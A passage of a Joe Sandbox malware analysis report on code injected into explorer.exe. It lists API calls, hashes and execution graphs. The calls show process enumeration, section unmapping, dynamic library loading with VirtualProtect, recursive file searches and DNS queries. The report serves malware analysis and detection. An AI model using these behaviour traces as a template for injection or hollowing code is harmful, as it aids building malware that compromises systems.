                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave
                        • String ID: 8`8$POST
                        • API String ID: 3168844106-697272677
                        • Opcode ID: 2e59c4a891d730ab559cfadb4a7836da4c2da07c9888bc96c72d6bdc12c6f45c
                        • Instruction ID: b40f0e3ff46f9905e7421299da68f5d996d0ce42bf82e802be5ecf5b71ad7877
                        • Opcode Fuzzy Hash: 2e59c4a891d730ab559cfadb4a7836da4c2da07c9888bc96c72d6bdc12c6f45c
                        • Instruction Fuzzy Hash: 2B016D75504314EBCB233F20EC4985F7B6DEE85BA1B1940A0FA0A9A221DF31D951D7A1
                        Function 00381E4C Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00381E83
                        • LoadLibraryA.KERNEL32(?,00386058,00000000,00000000,74DF2EE0,00000000,003820DC,?), ref: 00381EAB
                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00381ED8
                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00381F29
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                        • String ID:
                        • API String ID: 3827878703-0
                        • Opcode ID: 849f30e96c1a80683f96b46e9d4e56458c52d4400d7f032e43962039f23bd457
                        • Instruction ID: 243ec1dd1bcf430115aa87ef86bdcba57cdaf9d89b58fe154b124e9da1104930
                        • Opcode Fuzzy Hash: 849f30e96c1a80683f96b46e9d4e56458c52d4400d7f032e43962039f23bd457
                        • Instruction Fuzzy Hash: FD31AE72704316ABCB26DF29CC84BA6B7ACFF15354F1545ACE946CB600D731E846CBA0
                        Function 003812AA Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00000400,00000000), ref: 003812BC
                        • IsWow64Process.KERNEL32(000000FF,?), ref: 003812CE
                        • IsWow64Process.KERNEL32(00000000,?), ref: 003812E1
                        • CloseHandle.KERNEL32(00000000), ref: 003812F7
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Process$Wow64$CloseHandleOpen
                        • String ID:
                        • API String ID: 331459951-0
                        • Opcode ID: 3ff4b095607d1898fa85e4e11698cfc4750fe726bb9ef9735977d7808fa90168
                        • Instruction ID: 6c40d89ff50ae6351f39cdc7feeff0d7e0c93de6ec67ccd5829a9baeccc2c175
                        • Opcode Fuzzy Hash: 3ff4b095607d1898fa85e4e11698cfc4750fe726bb9ef9735977d7808fa90168
                        • Instruction Fuzzy Hash: E8F090B1806319FFDB22DFA0AD449EFB76CEA01351F2042EAE901D2140D7314E0297A1
                        Function 003833B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        • RtlEnterCriticalSection.NTDLL(00386038), ref: 003833D5
                          • Part of subcall function 00383132: lstrlen.KERNEL32(00000000), ref: 0038322D
                          • Part of subcall function 00382F1F: CreateThread.KERNEL32(00000000,00000000,00382ED2,?,00000000,00000000), ref: 00382F2F
                          • Part of subcall function 00382F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00382F36
                        • RtlLeaveCriticalSection.NTDLL(00386038), ref: 003833F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSection$CloseCreateEnterHandleLeaveQueryThreadVirtuallstrlen
                        • String ID: 8`8
                        • API String ID: 3739322420-2563161603
                        • Opcode ID: bab1d81c8ff765e3afc07fe47cad0117e6f82e1805967be934faa0f01e50ca0d
                        • Instruction ID: 6efc3a53ac29ab230f94af4b106e6483ecd24fb92bf6506a427d483ba63b6a1f
                        • Opcode Fuzzy Hash: bab1d81c8ff765e3afc07fe47cad0117e6f82e1805967be934faa0f01e50ca0d
                        • Instruction Fuzzy Hash: 77E0ED7520430997CB02BF50D94ABAF7779FBD0B42F5000A5BA015A291CB749956CBA1
                        Function 00383401 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        • RtlEnterCriticalSection.NTDLL(00386038), ref: 0038341D
                          • Part of subcall function 00383132: lstrlen.KERNEL32(00000000), ref: 0038322D
                          • Part of subcall function 00382F1F: CreateThread.KERNEL32(00000000,00000000,00382ED2,?,00000000,00000000), ref: 00382F2F
                          • Part of subcall function 00382F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00382F36
                        • RtlLeaveCriticalSection.NTDLL(00386038), ref: 0038343B
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSection$CloseCreateEnterHandleLeaveQueryThreadVirtuallstrlen
                        • String ID: 8`8
                        • API String ID: 3739322420-2563161603
                        • Opcode ID: 3eec3285d1687fe8fa123858a211477c8bb28e5efe1d90f90dc0365b4601050b
                        • Instruction ID: bf4972febd58af5f84dadc407cce7340c27a6c14e50ec4ea07f04963e7cd47de
                        • Opcode Fuzzy Hash: 3eec3285d1687fe8fa123858a211477c8bb28e5efe1d90f90dc0365b4601050b
                        • Instruction Fuzzy Hash: DAE09A30204308EBCB03BF50DC49BAE737ABBC0B01F0080E5BA115B3A1CB708A02CB52
                        Function 00383371 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        • RtlEnterCriticalSection.NTDLL(00386038), ref: 0038338D
                          • Part of subcall function 00383132: lstrlen.KERNEL32(00000000), ref: 0038322D
                          • Part of subcall function 00382F1F: CreateThread.KERNEL32(00000000,00000000,00382ED2,?,00000000,00000000), ref: 00382F2F
                          • Part of subcall function 00382F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00382F36
                        • RtlLeaveCriticalSection.NTDLL(00386038), ref: 003833AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSection$CloseCreateEnterHandleLeaveQueryThreadVirtuallstrlen
                        • String ID: 8`8
                        • API String ID: 3739322420-2563161603
                        • Opcode ID: 4dc35a57d69e1cfbdf7981d917a25061912a50481c29520ffe567b2f8b64bfcb
                        • Instruction ID: aade28ccf7f08dc805b1dd71376eab27b076445c0a7780384cb69cfedae5aa2e
                        • Opcode Fuzzy Hash: 4dc35a57d69e1cfbdf7981d917a25061912a50481c29520ffe567b2f8b64bfcb
                        • Instruction Fuzzy Hash: 5BE06D7420430997CB03BF50D94ABAE7779ABC0B41F4000A4BA016A391CA709856CBA1

                        Execution Graph

                        Execution Coverage:7.8%
                        Dynamic/Decrypted Code Coverage:43.1%
                        Signature Coverage:0%
                        Total number of Nodes:51
                        Total number of Limit Nodes:5
                        execution_graph 1529 cad5da 1530 cad614 1529->1530 1531 cad91d 1530->1531 1534 cad748 1530->1534 1536 cad74d 1534->1536 1535 cad835 LoadLibraryA 1535->1536 1536->1535 1538 cad884 VirtualProtect VirtualProtect 1536->1538 1540 cad6f8 1536->1540 1539 cad912 1538->1539 1539->1539 1487 cad748 1489 cad74d 1487->1489 1488 cad835 LoadLibraryA 1488->1489 1489->1488 1491 cad884 VirtualProtect VirtualProtect 1489->1491 1493 cad879 1489->1493 1492 cad912 1491->1492 1492->1492 1541 cad637 1542 cad62e 1541->1542 1543 cad91d 1542->1543 1544 cad748 3 API calls 1542->1544 1545 cad6f8 1544->1545 1494 ca4914 1506 ca1d08 CreateToolhelp32Snapshot 1494->1506 1497 ca1d08 5 API calls 1498 ca4941 1497->1498 1499 ca1d08 5 API calls 1498->1499 1500 ca494d SleepEx 1499->1500 1504 ca4962 1500->1504 1501 ca4a18 1502 ca49e0 1502->1501 1503 ca1eb4 6 API calls 1502->1503 1503->1501 1504->1502 1513 ca1eb4 1504->1513 1507 ca1d7a 1506->1507 1508 ca1d2c Process32First 1506->1508 1507->1497 1509 ca1d56 1508->1509 1510 ca1d71 FindCloseChangeNotification 1509->1510 1511 ca1d44 lstrcmpi 1509->1511 1512 ca1d5f Process32Next 1509->1512 1510->1507 1511->1509 1511->1512 1512->1509 1521 ca1db0 1513->1521 1515 ca1ed6 1516 ca1efd FindFirstFileW 1515->1516 1517 ca1f8f 1516->1517 1520 ca1f14 1516->1520 1517->1504 1518 ca1f74 FindNextFileW 1519 ca1f86 FindClose 1518->1519 1518->1520 1519->1517 1520->1518 1522 ca1dde 1521->1522 1523 ca1dfb FindFirstFileW 1522->1523 1524 ca1e8e 1523->1524 1527 ca1e12 1523->1527 1524->1515 1525 ca1e73 FindNextFileW 1526 ca1e85 FindClose 1525->1526 1525->1527 1526->1524 1527->1525 1528 ca1eb4 3 API calls 1527->1528 1528->1527

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00CA1BC8 1 Function_00CAD0C3 2 Function_00CA3FC0 3 Function_00CA29C0 4 Function_00CAD4C4 5 Function_00CAD5DA 57 Function_00CAD748 5->57 6 Function_00CA18D0 7 Function_00CA1CD0 8 Function_00CA72D0 9 Function_00CA14D4 10 Function_00CA1FD4 10->10 51 Function_00CA1FB0 10->51 72 Function_00CA1860 10->72 114 Function_00CA1838 10->114 11 Function_00CA28D4 13 Function_00CA1BE8 11->13 64 Function_00CA2754 11->64 112 Function_00CA2838 11->112 12 Function_00CA18E8 14 Function_00CACCE2 15 Function_00CA45E0 15->2 15->13 31 Function_00CA4280 15->31 16 Function_00CA21E4 17 Function_00CA18F8 18 Function_00CA3FF8 89 Function_00CA1A04 18->89 19 Function_00CA14F9 20 Function_00CA35FC 20->13 20->72 21 Function_00CA3AF0 21->20 92 Function_00CA3818 21->92 22 Function_00CA3CF0 22->13 22->21 24 Function_00CA3B8C 22->24 43 Function_00CA3CAC 22->43 111 Function_00CA3424 22->111 115 Function_00CA343C 22->115 116 Function_00CA3C3C 22->116 23 Function_00CA2F88 24->12 56 Function_00CA3B48 24->56 62 Function_00CA345C 24->62 24->89 25 Function_00CA188C 25->114 26 Function_00CA1A8C 27 Function_00CA1D8C 28 Function_00CA268C 66 Function_00CA2368 28->66 28->72 28->114 29 Function_00CA4C80 29->11 29->13 29->26 35 Function_00CA3D9C 29->35 29->72 77 Function_00CA277C 29->77 96 Function_00CA211C 29->96 29->114 30 Function_00CA4680 30->2 30->13 30->31 31->72 31->89 31->114 32 Function_00CA1C80 33 Function_00CA2F84 34 Function_00CA2298 36 Function_00CA299C 37 Function_00CACD92 38 Function_00CA3690 38->89 39 Function_00CA3A90 39->12 39->28 39->72 103 Function_00CA2214 39->103 40 Function_00CA3094 40->23 40->72 40->114 41 Function_00CA4094 41->18 41->72 41->89 41->114 42 Function_00CA4AA9 43->62 44 Function_00CA1CA0 45 Function_00CA4BA0 46 Function_00CA44A4 46->2 46->22 46->41 47 Function_00CAD0BB 48 Function_00CA4BB8 49 Function_00CA14B2 50 Function_00CA1DB0 50->27 54 Function_00CA1EB4 50->54 50->72 50->114 52 Function_00CA4BB0 53 Function_00CACFB7 54->27 54->50 54->72 54->114 55 Function_00CA3048 55->114 76 Function_00CA317C 56->76 98 Function_00CA2F10 56->98 81 Function_00CAD70A 57->81 58 Function_00CA3E4C 58->72 58->114 59 Function_00CA4C42 60 Function_00CA4540 60->2 60->13 60->31 61 Function_00CA4B5E 62->13 62->25 62->114 63 Function_00CA4C5C 65 Function_00CA1254 66->6 66->17 66->25 66->34 66->72 113 Function_00CA1938 66->113 66->114 67 Function_00CA4B6F 68 Function_00CA156C 69 Function_00CACD63 70 Function_00CA3F60 70->12 70->28 70->72 70->103 71 Function_00CA1560 72->13 73 Function_00CA2964 73->36 74 Function_00CA6279 75 Function_00CAD57E 76->6 76->40 76->55 76->72 95 Function_00CA311C 76->95 77->6 77->64 77->73 78 Function_00CA4A7C 79 Function_00CA1576 80 Function_00CA1B74 82 Function_00CA1D08 82->7 83 Function_00CA1508 84 Function_00CA370C 84->89 85 Function_00CACC0D 86 Function_00CA5300 86->13 86->29 86->86 90 Function_00CA5104 86->90 86->114 87 Function_00CA2C00 87->3 87->13 102 Function_00CA2B14 87->102 88 Function_00CA1000 90->0 90->13 90->32 90->44 90->80 90->87 90->89 105 Function_00CA1C28 90->105 110 Function_00CA3F20 90->110 90->113 90->114 91 Function_00CA1405 92->6 92->12 92->16 92->38 92->72 92->84 92->89 92->114 93 Function_00CA7318 94 Function_00CA4B1E 97 Function_00CA141D 98->114 99 Function_00CA4710 99->2 99->6 99->12 99->13 99->18 99->22 99->41 99->89 100 Function_00CAD416 101 Function_00CA4914 101->54 101->72 101->82 101->114 103->114 104 Function_00CA4C14 106 Function_00CA4B2E 107 Function_00CA4C2E 108 Function_00CAD42D 109 Function_00CA1822 110->58 116->12 116->56 116->62 117 Function_00CAD637 117->57

                        Executed Functions

                        Function 00CA1DB0 Relevance: 4.6, APIs: 3, Instructions: 109fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • FindFirstFileW.KERNELBASE ref: 00CA1E03
                        • FindNextFileW.KERNELBASE ref: 00CA1E7B
                        • FindClose.KERNELBASE ref: 00CA1E88
                          • Part of subcall function 00CA1EB4: FindFirstFileW.KERNELBASE ref: 00CA1F05
                          • Part of subcall function 00CA1EB4: FindNextFileW.KERNELBASE ref: 00CA1F7C
                          • Part of subcall function 00CA1EB4: FindClose.KERNELBASE ref: 00CA1F89
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                        • Instruction ID: 3b09bc9258ebc9c93ee87b178c5db0792f2dd5519d818a8982913b2c979b2f02
                        • Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                        • Instruction Fuzzy Hash: 5621C33021CE094BDB48FB2CA89D2A933D1EB99354F04066DEC5EC3296DE3899058789
                        Function 00CA1EB4 Relevance: 4.6, APIs: 3, Instructions: 94fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00CA1DB0: FindFirstFileW.KERNELBASE ref: 00CA1E03
                          • Part of subcall function 00CA1DB0: FindNextFileW.KERNELBASE ref: 00CA1E7B
                          • Part of subcall function 00CA1DB0: FindClose.KERNELBASE ref: 00CA1E88
                        • FindFirstFileW.KERNELBASE ref: 00CA1F05
                        • FindNextFileW.KERNELBASE ref: 00CA1F7C
                        • FindClose.KERNELBASE ref: 00CA1F89
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                        • Instruction ID: de4b23357dcfac6a0f7caa9a4fe0b9e599338d32b8a7c7d465b47eb659b0ec7b
                        • Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                        • Instruction Fuzzy Hash: A221867020CB484FDF44FF6898983A977E1FBA9348F04066DA95EC3292DF38DA448785
                        Function 00CA5300 Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 136 ca5300-ca5310 call ca1be8 139 ca5312-ca5345 call ca1838 136->139 140 ca5390-ca5395 136->140 144 ca5371-ca538a NtUnmapViewOfSection 139->144 145 ca5347 call ca1838 139->145 147 ca539c-ca53ab call ca5104 144->147 148 ca538c-ca538e 144->148 150 ca534c-ca5365 145->150 155 ca53ad-ca53b0 call ca5300 147->155 156 ca53b5-ca53be 147->156 148->140 151 ca5396-ca539b call ca4c80 148->151 150->144 151->147 155->156
                        APIs
                        • NtUnmapViewOfSection.NTDLL ref: 00CA5378
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: SectionUnmapView
                        • String ID:
                        • API String ID: 498011366-0
                        • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                        • Instruction ID: b038c54e32bc9b9ac30473c9c6d3a259e84b6544f1cde80b57b8e89b9a58f644
                        • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                        • Instruction Fuzzy Hash: AF110660602D0A4FEF5CF7F954992793395EB56305F54403AE82AC72A2DA298A408300
                        Function 00CA1D08 Relevance: 7.5, APIs: 5, Instructions: 47processstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00CA1D1D
                        • Process32First.KERNEL32 ref: 00CA1D3C
                        • lstrcmpi.KERNEL32 ref: 00CA1D4C
                        • Process32Next.KERNEL32 ref: 00CA1D67
                        • FindCloseChangeNotification.KERNELBASE ref: 00CA1D74
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
                        • String ID:
                        • API String ID: 545148253-0
                        • Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                        • Instruction ID: c413750b090e74d52628d794d9f200db68ba698c750089ea0f6349cf4fcceae5
                        • Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                        • Instruction Fuzzy Hash: 6501A230208A098FD755EF28D8883AE76E2FBDD318F04072DA55EC7194DB38CA458B45
                        Function 00CAD748 Relevance: 4.7, APIs: 3, Instructions: 246memorylibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 9 cad748-cad74b 10 cad755-cad759 9->10 11 cad75b-cad763 10->11 12 cad765 10->12 11->12 13 cad74d-cad753 12->13 14 cad767 12->14 13->10 15 cad76a-cad771 14->15 17 cad77d 15->17 18 cad773-cad77b 15->18 17->15 19 cad77f-cad782 17->19 18->17 20 cad797-cad7a4 19->20 21 cad784-cad792 19->21 31 cad7be-cad7cc call cad70a 20->31 32 cad7a6-cad7a8 20->32 22 cad7ce-cad7e9 21->22 23 cad794-cad795 21->23 25 cad81a-cad81d 22->25 23->20 26 cad81f-cad820 25->26 27 cad822-cad829 25->27 29 cad801-cad805 26->29 30 cad82f-cad833 27->30 33 cad7eb-cad7ee 29->33 34 cad807-cad80a 29->34 35 cad884-cad88d 30->35 36 cad835-cad84e LoadLibraryA 30->36 31->10 39 cad7ab-cad7b2 32->39 33->27 37 cad7f0 33->37 34->27 40 cad80c-cad810 34->40 38 cad890-cad899 35->38 42 cad84f-cad856 36->42 43 cad7f1-cad7f5 37->43 44 cad89b-cad89d 38->44 45 cad8be-cad90e VirtualProtect * 2 38->45 56 cad7bc 39->56 57 cad7b4-cad7ba 39->57 40->43 46 cad812-cad819 40->46 42->30 48 cad858-cad86e 42->48 43->29 49 cad7f7-cad7f9 43->49 50 cad89f-cad8ae 44->50 51 cad8b0-cad8bc 44->51 53 cad912-cad917 45->53 46->25 59 cad879-cad883 48->59 60 cad870-cad877 48->60 49->29 55 cad7fb-cad7ff 49->55 50->38 51->50 53->53 58 cad919-cad928 53->58 55->29 55->34 56->31 56->39 57->56 60->42
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 00CAD847
                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00CAD8E5
                        • VirtualProtect.KERNELBASE ref: 00CAD903
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CAC000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CAC000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_cac000_explorer.jbxd
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                        • Instruction ID: 3b610dda8072a732c91eca8d69b3994cf4052b1a082b2f1eebbcdd072a0c9970
                        • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                        • Instruction Fuzzy Hash: DF517A3225491F0BCB28AB789CC43E5B7D1F757329B58063AD4ABC36C9EA58C94783C1
                        Function 00CA1B74 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 107 ca1b74-ca1b94 OpenFileMappingA 108 ca1b96-ca1bb4 MapViewOfFile 107->108 109 ca1bb7-ca1bc4 107->109 108->109
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: File$MappingOpenView
                        • String ID:
                        • API String ID: 3439327939-0
                        • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                        • Instruction ID: d2b0416f8d2dd8bd6224af6b249c26280dae660d7f0a6161c980e368c1a016b5
                        • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                        • Instruction Fuzzy Hash: FEF08234318F094FAB44EF7C9C8C535B7E0EBA8202B04867E985AC7164EF34C8808711
                        Function 00CA4914 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 110 ca4914-ca496f call ca1d08 * 3 SleepEx call ca1838 119 ca4977-ca4979 110->119 120 ca497b-ca498e 119->120 121 ca49e0-ca49f4 119->121 126 ca4994-ca49de call ca1838 call ca1eb4 call ca1860 120->126 124 ca4a18-ca4a2f 121->124 125 ca49f6-ca4a13 call ca1eb4 121->125 125->124 126->121
                        APIs
                          • Part of subcall function 00CA1D08: CreateToolhelp32Snapshot.KERNEL32 ref: 00CA1D1D
                          • Part of subcall function 00CA1D08: Process32First.KERNEL32 ref: 00CA1D3C
                          • Part of subcall function 00CA1D08: FindCloseChangeNotification.KERNELBASE ref: 00CA1D74
                          • Part of subcall function 00CA1D08: lstrcmpi.KERNEL32 ref: 00CA1D4C
                          • Part of subcall function 00CA1D08: Process32Next.KERNEL32 ref: 00CA1D67
                        • SleepEx.KERNEL32 ref: 00CA4952
                          • Part of subcall function 00CA1EB4: FindFirstFileW.KERNELBASE ref: 00CA1F05
                          • Part of subcall function 00CA1EB4: FindNextFileW.KERNELBASE ref: 00CA1F7C
                          • Part of subcall function 00CA1EB4: FindClose.KERNELBASE ref: 00CA1F89
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirstNextProcess32$ChangeCreateNotificationSleepSnapshotToolhelp32lstrcmpi
                        • String ID:
                        • API String ID: 2273424085-0
                        • Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                        • Instruction ID: 5691494e7e344ea6175097afb0ec127694d4cf5068bc447d20e542ba799520ce
                        • Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                        • Instruction Fuzzy Hash: 5231D731608A194FDB59FF68E8995EA73E2FB99301F14462EE84BC31A1DE38990187C0

                        Execution Graph

                        Execution Coverage:10.3%
                        Dynamic/Decrypted Code Coverage:97.4%
                        Signature Coverage:0%
                        Total number of Nodes:306
                        Total number of Limit Nodes:42
                        execution_graph 985 841425 986 841432 985->986 987 84144b 985->987 988 842608 VirtualQuery 986->988 989 84143a 988->989 989->987 990 841493 23 API calls 989->990 990->987 991 842806 VirtualFree 992 841eb6 993 841ecc lstrlen 992->993 994 841ed9 992->994 993->994 1003 842861 GetProcessHeap RtlAllocateHeap 994->1003 996 841ee1 lstrcat 997 841f16 lstrcat 996->997 998 841f1d 996->998 997->998 1004 841f4a 998->1004 1001 842843 3 API calls 1002 841f40 1001->1002 1003->996 1038 8422b8 1004->1038 1008 841f77 1043 8427e2 lstrlen MultiByteToWideChar 1008->1043 1010 841f86 1044 842374 RtlZeroMemory 1010->1044 1013 84229a 1015 842843 3 API calls 1013->1015 1014 841fd8 RtlZeroMemory 1016 84200d 1014->1016 1017 841f2d 1015->1017 1016->1013 1021 84203b 1016->1021 1046 8422e5 1016->1046 1017->1001 1019 842280 1019->1013 1020 842843 3 API calls 1019->1020 1020->1013 1021->1019 1055 842861 GetProcessHeap RtlAllocateHeap 1021->1055 1023 84210b wsprintfW 1024 842131 1023->1024 1028 84219e 1024->1028 1056 842861 GetProcessHeap RtlAllocateHeap 1024->1056 1026 84216b wsprintfW 1026->1028 1027 84225d 1029 842843 3 API calls 1027->1029 1028->1027 1057 842861 GetProcessHeap RtlAllocateHeap 1028->1057 1030 842271 1029->1030 1030->1019 1032 842843 3 API calls 1030->1032 1032->1019 1033 842256 1036 842843 3 API calls 1033->1036 1034 8421e9 1034->1033 1058 842815 VirtualAlloc 1034->1058 1036->1027 1037 842243 RtlMoveMemory 1037->1033 1039 8422c2 1038->1039 1041 841f69 1038->1041 1040 8426e6 2 API calls 1039->1040 1040->1041 1042 842861 GetProcessHeap RtlAllocateHeap 1041->1042 1042->1008 1043->1010 1045 841f96 1044->1045 1045->1013 1045->1014 1047 842353 1046->1047 1049 8422f2 1046->1049 1047->1021 1048 8422f6 DnsQuery_W 1048->1049 1049->1047 1049->1048 1050 842335 DnsFree inet_ntoa 1049->1050 1050->1049 1051 842355 1050->1051 1059 842861 GetProcessHeap RtlAllocateHeap 1051->1059 1053 84235f 1060 8427e2 lstrlen MultiByteToWideChar 1053->1060 1055->1023 1056->1026 1057->1034 1058->1037 1059->1053 1060->1047 707 841000 708 841007 707->708 709 841010 707->709 711 841016 708->711 760 842608 VirtualQuery 711->760 714 841097 714->709 716 84102c RtlMoveMemory 717 841071 NtUnmapViewOfSection GetCurrentProcessId 716->717 718 84104d 716->718 720 841092 717->720 721 84109e 717->721 797 842861 GetProcessHeap RtlAllocateHeap 718->797 720->714 723 841095 720->723 763 8410a4 721->763 722 841052 RtlMoveMemory 722->717 798 841332 723->798 725 8410a3 727 842861 GetProcessHeap RtlAllocateHeap 725->727 728 8410cc 727->728 729 8410dc CreateToolhelp32Snapshot 728->729 730 8410f0 Process32First 729->730 731 841322 Sleep 729->731 732 84110c lstrcmpiA 730->732 733 84131b FindCloseChangeNotification 730->733 731->729 734 841124 lstrcmpiA 732->734 753 841280 732->753 733->731 735 841138 lstrcmpiA 734->735 734->753 737 84114c lstrcmpiA 735->737 735->753 736 8425ad OpenProcess IsWow64Process IsWow64Process CloseHandle 736->753 738 841160 lstrcmpiA 737->738 737->753 740 841170 lstrcmpiA 738->740 738->753 739 841305 Process32Next 739->732 741 841319 739->741 742 841184 lstrcmpiA 740->742 740->753 741->733 743 841198 lstrcmpiA 742->743 742->753 744 8411ac lstrcmpiA 743->744 743->753 745 8411c0 lstrcmpiA 744->745 744->753 746 8411d4 lstrcmpiA 745->746 745->753 747 8411e8 lstrcmpiA 746->747 